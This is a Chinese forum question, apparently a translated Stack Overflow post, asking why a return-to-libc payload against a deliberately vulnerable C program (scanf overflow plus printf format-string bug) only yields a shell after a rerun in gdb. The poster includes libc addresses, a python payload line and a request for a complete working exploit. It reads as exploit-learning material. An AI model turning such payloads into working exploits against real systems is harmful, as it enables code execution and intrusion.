返回libc攻击

我正在尝试使用格式字符串攻击向量对以下代码实施返回libc攻击。

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char *argv[])
{
   char a[10];
   scanf("%s",&a);  
   printf(a);
   return 0;
}

我已经使用中的p system命令找出了system（）的地址gdb。通过检查使用的堆栈框架x/500s $esp，我得出了包含的环境变量的地址\bin\sh。

system: 0xf7e2cda0 
exit: 0xf7e209d0
\bin\bash: 0xffffd207

完成这些操作后，我构造了以下格式字符串：

python -c 'print "A"*14 + "\xbc\xcd\xff\xff" + "\xa0\xcd\xe2\xf7" + "\xd0\x09\xe2\xf7" + "\x07\xd2\xff\xff"' > inp

其中0xffffcdbc - 0x4是包含系统地址0xf7e2cda0值的本地地址。

我使用编译了程序，gcc -m32 -fno-stack-protector -o sh sh.c并使用运行了程序gdb sh。执行后，输入r<inp，我得到以下输出

如上所示，显示了一些错误命令，只有在r再次运行命令后，我才进入外壳。有人可以解释一下我在这里缺少什么，以便我直接进入shell吗？

另外，当我尝试./sh < inp通过偏移gdb地址来执行不带gdb（by ）的上述程序时，出现了段错误错误。我假设一旦上述修复得到纠正，就可以解决。

请给出一个完整的可用漏洞利用程序进行回答-大多数在线教程都用于argv[1]解释类似的问题，但我希望在不使用参数的情况下使漏洞利用工作。

谢谢！